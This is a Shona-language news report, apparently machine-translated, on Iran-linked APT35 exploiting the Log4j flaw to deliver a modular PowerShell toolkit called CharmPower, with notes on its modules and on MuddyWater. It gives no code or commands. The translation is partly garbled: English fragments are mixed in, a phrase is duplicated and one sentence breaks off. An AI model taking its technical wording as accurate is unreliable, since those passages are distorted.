Boka revatsotsi vari kushandisa Apache Log4j kusazvibata

log4j

Nhau dzakaburitswa kuti nguva pfupi yadarika vakaona boka revatsotsi vaitsigirwa nenyika yeIran izvo vari kushingaira kushandisa vulnerabilities in apachelog4j kugovera seti nyowani ye modular PowerShell zvishandiso.

Yakatsanangurwa nevaongorori veCheck Point Software Technologies, Boka reHacker APT35, rinozivikanwawo sePhosphorous uye Charming Kitten, rakatanga kuonekwa richibiridzira Log4j mazuva mana chete mushure mekutanga kusazvibata kwaziviswa.

The attack setup zvinorondedzerwa sechimbichimbi, kubva boka yaingoshandisa yakavhurika sosi JNDI exploit kit.

Mushure mekuwana mukana kune sevhisi isina njodzi, iyo Iranian hackers yaisanganisira nyowani modular chimiro chakavakirwa paPowerShelchii chainzi "CharmPower". Iyo script inoshandiswa kumisikidza kushingirira, kuunganidza ruzivo, uye kuita mirairo.

CharmPower Iine mamodule mana ekutanga ekutanga:

  • Yekutanga inosimbisa network network
  • Yechipiri inounganidza yakakosha sisitimu ruzivo senge Windows vhezheni, zita rekombuta, uye zviri mukati meakasiyana system mafaera.
  • Iyo yechitatu modhi inosarudza iyo yekuraira uye yekudzora domain yakatorwa kubva kune encoded URL yakachengetwa muAmazon Web Services Inc S3 repository.
  • Ipo iyo yekupedzisira module inogashira, decrypts uye inoita iyo yekutevera mamodule.

Maererano ne ruzivo rwakaunganidzwa yekutanga kutumirwa, APT35 ipapo shandisa mamwe mamodule etsika kufambisa kubiwa kwedata uye kuvanza kuvepo kwayo pamushini une hutachiona.

APT35 iboka rinozivikanwa rekubira iro rakabatana nekurwiswa kwa2020 pamushandirapamwe waTrump, vakuru vakuru vehurumende yeUS uye vekare, vatori venhau vanobata zvematongerwo enyika, uye maIran ane mukurumbira anogara kunze kweIran. Boka iri zvakare rakanangana neMunich Security Musangano gore iroro.

"Ongororo yekubatanidza kushandiswa kweLog4Shell neIranian APT Charming Kitten inopindirana, uye neimwe nzira inopokana, nekutaura kwakaitwa neUS Cybersecurity Infrastructure and Security Agency muna Ndira 10 iyo yakataura kuti pakanga pasina kupindira kwakakosha kune chekuita nebug panguva iyoyo. nguva."

"Izvi zvinogona kusimbisa nyaya dzazvino nekuburitswa kwechiitiko uye kubuda pachena, uye kunonoka kungavepo pakati pekutyisidzira kwevatambi uye kuwanikwa.

John Bambenek, mukuru wekutyisidzira muvhimi kukambani yeruzivo rwehunyanzvi hwekuita mabasa eNetenrich Inc., akati hazvishamise kuti vatambi venyika yechipiri vanotora mukana waunzwa nekusagadzikana kwelog4j nekuchimbidza.

"Chero basa resimba rinokwevera zvinhu iri rinogona kushandiswa nemunhu wese ari kutsvaga pekugara nekukurumidza, uye dzimwe nguva mahwindo ehungwaru akadai anovhurika, zvichireva kuti unofanirwa kukurumidza kuita," Bambenek akadaro. "Mubvunzo wakakura ndewekuti nderipi sangano rehungwaru raishandisa izvi njodzi isati yaburitswa pachena."

Iyo Log4j kukanganisa, iyo inozivikanwawo se Log4Shell uye inoteverwa seCVE-2021-44228, idambudziko guru nokuda kwehupamhi kushandiswa kwebhizinesi kweLog4j uye nhamba huru yegore-yakavakirwa maseva nemasevhisi izvo zvinogona kuratidzwa kusasimba kwerudzi rwe zeroday. Log4j, yemahara uye yakagovaniswa yakavhurika sosi chishandiso kubva kuApache Software Foundation, chishandiso chekutema matanda uye chikanganiso chinokanganisa shanduro 2.0 kuburikidza 2.14.1.

The security professionals vataura kuti kutyisidzira kwakaunzwa neLog4Shell kwakakwira kwete nekuda kwechiyero nekushandiswa kwechishandiso, asiwo nekuda kwekureruka kwarinogona kushandiswa nako vulnerability. Vanotyisidzira vanongoda kuendesa tambo ine kodhi ine hutsinye, iyo inoongororwa uye yakadhindwa neLog4j uye yakaiswa kune server. Ipapo ma hackers anogona kutora kutonga kwe

Nhau dzekuti Iranian hackers dzaishandisa Log4j kusazvibata dzakauya sezvo US Cyber ​​​​Command's National Cyber ​​​​Mission Force yakaratidza kuti yakaona akati wandei akavhurika maturusi ari kushandiswa nevamiriri vehungwaru vekuIran pamanetiweki emunhu wese.

Kuburitswa uku kune chekuita neboka reIran rinotsigirwa nekubira rinonzi "MuddyWater."

Boka iri rakabatana neIran's Ministry of Intelligence and Security uye rakanangana zvakanyanya nedzimwe nyika dziri kuMiddle East uye dzimwe nguva nyika dziri muEurope neNorth America.

Kana iwe uchida kuziva zvakawanda nezvazvo, iwe unogona kutarisa iyo ruzivo Mune inotevera chinongedzo.


Izvo zviri muchinyorwa zvinoomerera pamisimboti yedu ye tsika dzekunyora. Kuti utaure chikanganiso tinya pano.

Iva wekutanga kutaura

Siya yako yekutaura

Your kero e havazobvumirwi ichibudiswa.

*

*

  1. Inotarisira data: AB Internet Networks 2008 SL
  2. Chinangwa cheiyo data: Kudzora SPAM, manejimendi manejimendi.
  3. Legitimation: Kubvuma kwako
  4. Kutaurirana kwedata
  5. Dhata yekuchengetedza: Dhatabhesi inobatwa neOccentus Networks (EU)
  6. Kodzero: Panguva ipi neipi iwe unogona kudzora, kupora uye kudzima ruzivo rwako